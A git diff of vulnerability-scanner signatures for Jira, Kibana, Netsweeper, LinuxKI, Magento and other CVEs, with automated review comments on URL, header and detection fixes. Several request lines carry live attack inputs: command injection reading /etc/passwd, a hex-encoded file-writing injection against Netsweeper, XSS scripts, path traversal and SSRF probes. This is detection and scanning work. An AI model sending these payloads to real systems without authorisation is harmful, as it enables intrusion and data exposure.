- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
- - Sec-Fetch-Site: none
- - Sec-Fetch-Mode: navigate
- X-Atlassian-Token: no-check
- Accept-Encoding: gzip, deflate
- Accept-Language: en-US,en;q=0.9
- body: {'jql':'project in projectsLeadByUser("g147isalive")'}
+ body: |
+ {'jql':'project in projectsLeadByUser("g147isalive")'}
detections:
- >-
StringSearch("resBody", "the user does not exist")
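Review bot: Moving `body` into a block scalar fixes the old plain form, which YAML read as a flow mapping rather than a string, but the payload itself is still single-quoted pseudo-JSON (`{'jql':'...'}`) and the request carries no `Content-Type` header; if the endpoint behind `{{.endpoint}}` expects a JSON document, a strict parser rejects the body before `the user does not exist` can ever appear and the signature silently never matches. Consider `{"jql":"project in projectsLeadByUser(\"g147isalive\")"}` together with `- Content-Type: application/json`, and `|-` if the trailing newline is unwanted. The `endpoint` value is defined above this hunk, so I cannot confirm which API it targets.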
diff --git a/cves/jira-info-leak-cve-2019-8449.yaml b/cves/jira-info-leak-cve-2019-8449.yaml
index 1573ebf..3daef5b 100644
--- a/cves/jira-info-leak-cve-2019-8449.yaml
+++ b/cves/jira-info-leak-cve-2019-8449.yaml
@@ -4,7 +4,7 @@ info:
risk: Medium
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}?query=1&maxResults=50000&showAvatar=true
+ {{.root}}/{{.endpoint}}?query=1&maxResults=50000&showAvatar=true
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/jira-info-leak-cve-2020-14179.yaml b/cves/jira-info-leak-cve-2020-14179.yaml
index e803303..16f71fb 100644
--- a/cves/jira-info-leak-cve-2020-14179.yaml
+++ b/cves/jira-info-leak-cve-2020-14179.yaml
@@ -4,7 +4,7 @@ info:
risk: Medium
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,13 +12,13 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}!Default.jspa
+ {{.root}}/{{.endpoint}}!Default.jspa
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
- Referer: "{{.root}}/webadmin/admin/service_manager_data.php"
detections:
- >-
- StatusCode() == 200 && (StringSearch("resBody", "searchers") || StringSearch("resBody", "groups")
+ StatusCode() == 200 && (StringSearch("resBody", "searchers") || StringSearch("resBody", "groups"))
references:
- https://www.cvebase.com/cve/2020/14179
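Review bot: The context line `- Referer: "{{.root}}/webadmin/admin/service_manager_data.php"` sends the Netsweeper admin path that netsweeper-code-injection-cve-2020-13167 also uses, which has no relation to a Jira `!Default.jspa` request; it reads as a copy-paste leftover and should be removed, or set to a Jira page such as `{{.root}}/` if a Referer is wanted at all. The closing-parenthesis fix in the detection is correct. Now that `root` no longer ends in `/`, the header at least no longer yields a double slash.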
diff --git a/cves/jira-path-traversal-cve-2019-8442.yaml b/cves/jira-path-traversal-cve-2019-8442.yaml
index 768da07..ddbaffb 100644
--- a/cves/jira-path-traversal-cve-2019-8442.yaml
+++ b/cves/jira-path-traversal-cve-2019-8442.yaml
@@ -4,20 +4,23 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties
-requests:
+
+requests:
- method: GET
+ redirect: false
url: >-
- {{.root}}{{.endpoint}}
+ {{.root}}/{{.endpoint}}
headers:
- - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+ - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
detections:
- >-
- StringSearch("resBody", "artifactId")
+ StatusCode() == 200 && StringSearch("body", "") && StringSearch('body', '')
+
references:
- https://www.cvebase.com/cve/2019/8442
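Review bot: The rewritten detection drops the one content marker the old expression had (`artifactId`, present in both `pom.xml` and `pom.properties`) and replaces it with two `StringSearch` calls whose needles are empty as rendered here; if they are genuinely empty in the file, `StatusCode() == 200` alone decides the match and any 200 response counts as a traversal hit. Keep the marker alongside the status check: `StatusCode() == 200 && StringSearch("body", "artifactId")`. The expression also mixes `"body"` and `'body'` quoting on one line; pick one style.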
diff --git a/cves/jira-ssrf-cve-2017-9506.yaml b/cves/jira-ssrf-cve-2017-9506.yaml
index 38134a7..6a13652 100644
--- a/cves/jira-ssrf-cve-2017-9506.yaml
+++ b/cves/jira-ssrf-cve-2017-9506.yaml
@@ -4,7 +4,7 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}?consumerUri=https://ipinfo.io/json
+ {{.root}}/{{.endpoint}}?consumerUri=https://ipinfo.io/json
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/jira-ssrf-cve-2019-8451.yaml b/cves/jira-ssrf-cve-2019-8451.yaml
index 99e491f..55aa344 100644
--- a/cves/jira-ssrf-cve-2019-8451.yaml
+++ b/cves/jira-ssrf-cve-2019-8451.yaml
@@ -4,7 +4,7 @@ info:
risk: Medium
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}?url=https://{{Hostname}}:1337@example.com
+ {{.root}}/{{.endpoint}}?url=https://{{.Host}}:1337@example.com
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
- X-Atlassian-token: no-check
diff --git a/cves/jira-ssti-cve-2019-11581.yaml b/cves/jira-ssti-cve-2019-11581.yaml
index 49c4cd9..d3350a0 100644
--- a/cves/jira-ssti-cve-2019-11581.yaml
+++ b/cves/jira-ssti-cve-2019-11581.yaml
@@ -4,7 +4,7 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}!default.jspa
+ {{.root}}/{{.endpoint}}!default.jspa
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/jira-user-enumeration-cve-2020-14181.yaml b/cves/jira-user-enumeration-cve-2020-14181.yaml
index 5d467f9..3b42f5d 100644
--- a/cves/jira-user-enumeration-cve-2020-14181.yaml
+++ b/cves/jira-user-enumeration-cve-2020-14181.yaml
@@ -4,7 +4,7 @@ info:
risk: Medium
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}
+ {{.root}}/{{.endpoint}}
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/jira-xss-cve-2018-20824.yaml b/cves/jira-xss-cve-2018-20824.yaml
index 4ab7d41..8e12176 100644
--- a/cves/jira-xss-cve-2018-20824.yaml
+++ b/cves/jira-xss-cve-2018-20824.yaml
@@ -4,19 +4,18 @@ info:
risk: Medium
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
-variables:
- - endpoint: |
- plugins/servlet/Wallboard/
-requests:
+requests:
- method: GET
+ redirect: false
url: >-
- {{.root}}{{.endpoint}}?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)
+ {{.root}}/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)
headers:
- - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+ - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
detections:
- >-
- StatusCode() == 200 && RegexSearch("resBody", "(?mi)timeout:\salert\(document\.domain\)")
+ StatusCode() == 200 && StringSearch('response', 'alert(document.domain)') && StringSearch('response', 'AJS.WALLBOARD.')
+
references:
- https://www.cvebase.com/cve/2018/20824
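Review bot: The new detection `StringSearch('response', 'alert(document.domain)') && StringSearch('response', 'AJS.WALLBOARD.')` is looser than the regex it replaces: `alert(document.domain)` contains no HTML-special characters, so the substring is presumably also present when a patched Wallboard escapes `cyclePeriod` into a quoted string or attribute, and `AJS.WALLBOARD.` only proves the page is the wallboard. If the old `(?mi)timeout:\salert\(document\.domain\)` anchoring was dropped because of a matching problem, a middle ground is to keep a context token from the injection point, e.g. `StringSearch('response', 'timeout: alert(document.domain)')`. Without that, patched and unpatched instances can both satisfy the expression.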
diff --git a/cves/jira-xss-cve-2020-9344.yaml b/cves/jira-xss-cve-2020-9344.yaml
index fbd87b5..12fb6b1 100644
--- a/cves/jira-xss-cve-2020-9344.yaml
+++ b/cves/jira-xss-cve-2020-9344.yaml
@@ -4,46 +4,23 @@ info:
risk: Medium
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
-requests:
- - method: GET
- url: >-
- {{.root}}plugins/servlet/svnwebclient/changedResource.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E
- headers:
- - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
-
- detections:
- - >-
- StatusCode() == 200 && StringSearch("resBody", "")
- - method: GET
- url: >-
- {{.root}}plugins/servlet/svnwebclient/commitGraph.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E
- headers:
- - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
-
- detections:
- - >-
- StatusCode() == 200 && StringSearch("resBody", "")
- - method: GET
- url: >-
- {{.root}}plugins/servlet/svnwebclient/error.jsp?errormessage=%27%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&description=test
- headers:
- - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
-
- detections:
- - >-
- StatusCode() == 200 && StringSearch("resBody", "")
+replicate:
+ ports: '8080'
+ prefixes: 'jira, wiki, confluence'
+
+requests:
- method: GET
+ redirect: false
url: >-
- {{.root}}plugins/servlet/svnwebclient/statsItem.jsp?url=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E
+ {{.root}}/plugins/servlet/svnwebclient/error.jsp?errormessage=%27%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&description=test
headers:
- - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
-
+ - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
detections:
- >-
- StatusCode() == 200 && StringSearch("resBody", "")
+ StatusCode() == 200 && StringSearch('body', '') && StringSearch('body', 'jira.subversion-plus')
references:
- https://www.cvebase.com/cve/2020/9344
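Review bot: `prefixes: 'jira, wiki, confluence'` packs three prefixes into one comma-and-space separated string, whereas the other `replicate` blocks in this commit (`prefixes: 'jenkins'`, `prefixes: 'kibana'`) carry a single token, so this change does not show whether the loader splits on `,` and trims the spaces; if it does not, the second and third prefixes become ` wiki` and ` confluence`. Either confirm the format or write `prefixes: 'jira,wiki,confluence'`, and add a one-line comment above the block saying how it is parsed. The `StringSearch('body', '')` on the detection line has the empty-needle problem raised on graphql-playround-xss.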
diff --git a/cves/jolokia-xss-cve-2018-1000129.yaml b/cves/jolokia-xss-cve-2018-1000129.yaml
index 89af44e..3837f3b 100644
--- a/cves/jolokia-xss-cve-2018-1000129.yaml
+++ b/cves/jolokia-xss-cve-2018-1000129.yaml
@@ -4,20 +4,23 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- - endpoint: |
- jolokia/
- api/jolokia/
-requests:
+ - vul: |
+ /jolokia/
+ /monitoring/json/
+
+requests:
- method: GET
+ redirect: false
url: >-
- {{.root}}{{.endpoint}}read?mimeType=text/html
+ {{.root}}{{.vul}}read?mimeType=text/html
headers:
- - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+ - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
detections:
- >-
- StatusCode() == 200 && StringSearch("resBody", "") && StringSearch("resHeader", "text/html")
+ StatusCode() == 200 && StringSearch("resHeaders", 'Content-Type: text/html') && StringSearch("body", '')
+
references:
- https://www.cvebase.com/cve/2018/1000129
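Review bot: The renamed variable `vul` is the only one in this commit that departs from the `endpoint` name every other signature uses for the same role (a list of path prefixes expanded into `url`), which makes the repo harder to grep and the templates harder to compare; `- endpoint: |` with `{{.root}}{{.endpoint}}read?mimeType=text/html` keeps the convention while preserving the new leading-slash paths. Also, `StringSearch("resHeaders", 'Content-Type: text/html')` appears to match the header name case-sensitively; if the response comes through HTTP/2 or a proxy that lower-cases header names, `content-type: text/html` would be missed, so searching for just `text/html` (as kibana-timelion now does with `application/json`) is the more robust form. The `StringSearch("body", '')` needle is empty as rendered, see the note on graphql-playround-xss.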
diff --git a/cves/kibana-timelion-code-execution-cve-2019-7609.yaml b/cves/kibana-timelion-code-execution-cve-2019-7609.yaml
index 9fa12a2..bbec54e 100644
--- a/cves/kibana-timelion-code-execution-cve-2019-7609.yaml
+++ b/cves/kibana-timelion-code-execution-cve-2019-7609.yaml
@@ -4,21 +4,24 @@ info:
risk: Critical
params:
- - root: '{{.BaseURL}}/'
-
-variables:
- - endpoint: |
- api/timelion/run
-requests:
+ - root: "{{.BaseURL}}"
+
+replicate:
+ ports: '5601'
+ prefixes: 'kibana'
+
+requests:
- method: POST
url: >-
- {{.root}}{{.endpoint}}
+ {{.root}}/api/timelion/run
headers:
- - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
- body: "{\"sheet\":[\".es(*)\"],\"time\":{\"from\":\"now-1m\",\"to\":\"now\",\"mode\":\"quick\",\"interval\":\"auto\",\"timezone\":\"Asia/Shanghai\"}}"
+ - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
+ - Content-Type: "application/json; charset=utf-8"
+ body: |
+ {"sheet":[".es(*)"],"time":{"from":"now-1m","to":"now","mode":"quick","interval":"auto","timezone":"Asia/Shanghai"}}
detections:
- >-
- StatusCode() == 200 && StringSearch("resBody", "seriesList") && StringSearch("resHeaders", "Content-Type: application/json")
+ StatusCode() == 200 && StringSearch("response", "seriesList") && StringSearch("resHeaders", "application/json")
references:
- https://www.cvebase.com/cve/2019/7609
diff --git a/cves/kong-api-improper-authorization-cve-2020-11710.yaml b/cves/kong-api-improper-authorization-cve-2020-11710.yaml
index 0931e98..3d02e8c 100644
--- a/cves/kong-api-improper-authorization-cve-2020-11710.yaml
+++ b/cves/kong-api-improper-authorization-cve-2020-11710.yaml
@@ -4,7 +4,7 @@ info:
risk: Critical
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}
+ {{.root}}/{{.endpoint}}
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/kubelet-pprof-exposed-cve-2019-11248.yaml b/cves/kubelet-pprof-exposed-cve-2019-11248.yaml
index 7ee4fa1..e4563dd 100644
--- a/cves/kubelet-pprof-exposed-cve-2019-11248.yaml
+++ b/cves/kubelet-pprof-exposed-cve-2019-11248.yaml
@@ -4,7 +4,7 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}
+ {{.root}}/{{.endpoint}}
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/linuxki-rce-cve-2020-7209.yaml b/cves/linuxki-rce-cve-2020-7209.yaml
index b25b1ac..7e86576 100644
--- a/cves/linuxki-rce-cve-2020-7209.yaml
+++ b/cves/linuxki-rce-cve-2020-7209.yaml
@@ -4,7 +4,7 @@ info:
risk: Critical
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -13,7 +13,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END;
+ {{.root}}/{{.endpoint}}?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END;
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/lotus-domino-info-leak-cve-2005-2428.yaml b/cves/lotus-domino-info-leak-cve-2005-2428.yaml
index d9cd776..775b717 100644
--- a/cves/lotus-domino-info-leak-cve-2005-2428.yaml
+++ b/cves/lotus-domino-info-leak-cve-2005-2428.yaml
@@ -4,13 +4,13 @@ info:
risk: Medium
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
requests:
- method: GET
redirect: false
url: >-
- {{.root}}names.nsf/People?OpenView
+ {{.root}}/names.nsf/People?OpenView
headers:
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
detections:
diff --git a/cves/magento-magmi-improper-authentication-cve-2020-5777.yaml b/cves/magento-magmi-improper-authentication-cve-2020-5777.yaml
index 1998425..2e7c7e7 100644
--- a/cves/magento-magmi-improper-authentication-cve-2020-5777.yaml
+++ b/cves/magento-magmi-improper-authentication-cve-2020-5777.yaml
@@ -4,12 +4,12 @@ info:
risk: Critical
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
requests:
- method: GET
url: >-
- {{.root}}index.php/catalogsearch/advanced/result/?name=e
+ {{.root}}/index.php/catalogsearch/advanced/result/?name=e
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
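Review bot: The request is a GET to Magento's `index.php/catalogsearch/advanced/result/?name=e`, which is the storefront's advanced search, while the file name and CVE refer to the MAGMI importer's authentication; nothing in this hunk touches a MAGMI path, so either the request is a platform fingerprint rather than a check for the CVE or the endpoint is wrong. If it is only a fingerprint, the `risk: Critical` context line overstates what a match proves and `info.name` should say so. The detections are below the hunk, so I cannot tell which marker is expected.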
diff --git a/cves/magento-magmi-xss-cve-2017-7391.yaml b/cves/magento-magmi-xss-cve-2017-7391.yaml
index f928e9b..534d8c2 100644
--- a/cves/magento-magmi-xss-cve-2017-7391.yaml
+++ b/cves/magento-magmi-xss-cve-2017-7391.yaml
@@ -4,7 +4,7 @@ info:
risk: Medium
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}?prefix=%22%3E%3Cscript%3Ealert("cvebase");%3C/script%3E%3C
+ {{.root}}/{{.endpoint}}?prefix=%22%3E%3Cscript%3Ealert("cvebase");%3C/script%3E%3C
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/mara-cms-reflective-xss-cve-2020-24223.yaml b/cves/mara-cms-reflective-xss-cve-2020-24223.yaml
index b486076..3660401 100644
--- a/cves/mara-cms-reflective-xss-cve-2020-24223.yaml
+++ b/cves/mara-cms-reflective-xss-cve-2020-24223.yaml
@@ -4,7 +4,7 @@ info:
risk: Medium
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: POST
url: >-
- {{.root}}{{.endpoint}}?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
+ {{.root}}/{{.endpoint}}?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/mida-eframework-rce-cve-2020-15920.yaml b/cves/mida-eframework-rce-cve-2020-15920.yaml
index 7d00c51..c50ea35 100644
--- a/cves/mida-eframework-rce-cve-2020-15920.yaml
+++ b/cves/mida-eframework-rce-cve-2020-15920.yaml
@@ -4,7 +4,7 @@ info:
risk: Medium
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING
+ {{.root}}/{{.endpoint}}?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/mobileiron-rce-cve-2020-15505.yaml b/cves/mobileiron-rce-cve-2020-15505.yaml
index 965a1b3..67db3b8 100644
--- a/cves/mobileiron-rce-cve-2020-15505.yaml
+++ b/cves/mobileiron-rce-cve-2020-15505.yaml
@@ -14,7 +14,7 @@ requests:
- method: POST
redirect: false
url: >-
- {{.root}}{{.endpoint}}
+ {{.root}}/{{.endpoint}}
headers:
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
- Content-Type: x-application/hessian
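Review bot: This hunk changes the URL to `{{.root}}/{{.endpoint}}`, but unlike the other files in this commit it does not show `root` being changed from `'{{.BaseURL}}/'` to `'{{.BaseURL}}'`; `params` sit above line 14 and outside the hunk, so if this file's `root` still carries its trailing slash the request now goes to `host//endpoint`. Please confirm the `params` line or include it in the diff. The request definition also continues below the hunk, so the body and detections are not visible here.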
diff --git a/cves/ms-sharepoint-rce-cve-2020-1147.yaml b/cves/ms-sharepoint-rce-cve-2020-1147.yaml
index 2a97c08..9cf3d84 100644
--- a/cves/ms-sharepoint-rce-cve-2020-1147.yaml
+++ b/cves/ms-sharepoint-rce-cve-2020-1147.yaml
@@ -4,7 +4,7 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}?PageType=1&ListId=%7B13371337-1337-1337-1337-133713371337%7D
+ {{.root}}/{{.endpoint}}?PageType=1&ListId=%7B13371337-1337-1337-1337-133713371337%7D
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/ms-sharepoint-rce-cve-2020-16952.yaml b/cves/ms-sharepoint-rce-cve-2020-16952.yaml
index dfdbb28..579531a 100644
--- a/cves/ms-sharepoint-rce-cve-2020-16952.yaml
+++ b/cves/ms-sharepoint-rce-cve-2020-16952.yaml
@@ -4,12 +4,12 @@ info:
risk: Critical
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
requests:
- method: GET
url: >-
- {{.root}}
+ {{.root}}/
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
diff --git a/cves/netsweeper-code-injection-cve-2020-13167.yaml b/cves/netsweeper-code-injection-cve-2020-13167.yaml
index 2287608..d85bd9d 100644
--- a/cves/netsweeper-code-injection-cve-2020-13167.yaml
+++ b/cves/netsweeper-code-injection-cve-2020-13167.yaml
@@ -4,7 +4,7 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,8 +12,8 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5
- {{.root}}{{.endpoint}}out
+ {{.root}}/{{.endpoint}}tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5
+ {{.root}}/{{.endpoint}}out
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
- Referer: "{{.root}}/webadmin/admin/service_manager_data.php"
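Review bot: The first request on the new URL line writes a persistent artifact to the target: the hex in the `password` parameter decodes to `echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out`, and the second request then fetches `out` from the web root, so a positive result leaves a file behind in the product's admin directory. Nothing in the signature says so; add a comment above `requests:` such as `# intrusive: writes /usr/local/netsweeper/webadmin/out on the target; delete it after confirming` so operators know to clean up. The marker `nonexistent` is also identical for every scan, so a file left by an earlier run would make the second request match on an already-patched host; consider a per-run token in the marker so the match is attributable to this request.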
diff --git a/cves/nextjs-path-traversal-cve-2020-5284.yaml b/cves/nextjs-path-traversal-cve-2020-5284.yaml
index dd55d9b..c9393d8 100644
--- a/cves/nextjs-path-traversal-cve-2020-5284.yaml
+++ b/cves/nextjs-path-traversal-cve-2020-5284.yaml
@@ -4,7 +4,7 @@ info:
risk: Medium
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -13,7 +13,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}_next/static/../server/pages-manifest.json
+ {{.root}}/{{.endpoint}}_next/static/../server/pages-manifest.json
headers:
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
detections:
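Review bot: The traversal on the new URL line is a literal dot-segment, `_next/static/../server/pages-manifest.json`, which only reaches Next.js intact if the HTTP client and any intermediary send the path without normalising `..`; otherwise the request collapses to `/_next/server/pages-manifest.json` and the check silently misses vulnerable hosts. Verify on the wire that Jaeles sends the raw path, or add a second URL line with the encoded form `{{.root}}/{{.endpoint}}_next/static/%2e%2e/server/pages-manifest.json` so at least one variant may survive normalisation. The `detections:` block starts after the hunk, so I cannot tell whether a negative result is distinguishable from a normalised request.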
diff --git a/cves/nexus-repository-manager-rce-cve-2020-10199.yaml b/cves/nexus-repository-manager-rce-cve-2020-10199.yaml
index 83d42d5..86495e6 100644
--- a/cves/nexus-repository-manager-rce-cve-2020-10199.yaml
+++ b/cves/nexus-repository-manager-rce-cve-2020-10199.yaml
@@ -4,7 +4,7 @@ info:
risk: High
params:
- - root: '{{.BaseURL}}/'
+ - root: '{{.BaseURL}}'
variables:
- endpoint: |
@@ -12,7 +12,7 @@ variables:
requests:
- method: GET
url: >-
- {{.root}}{{.endpoint}}
+ {{.root}}/{{.endpoint}}
headers:
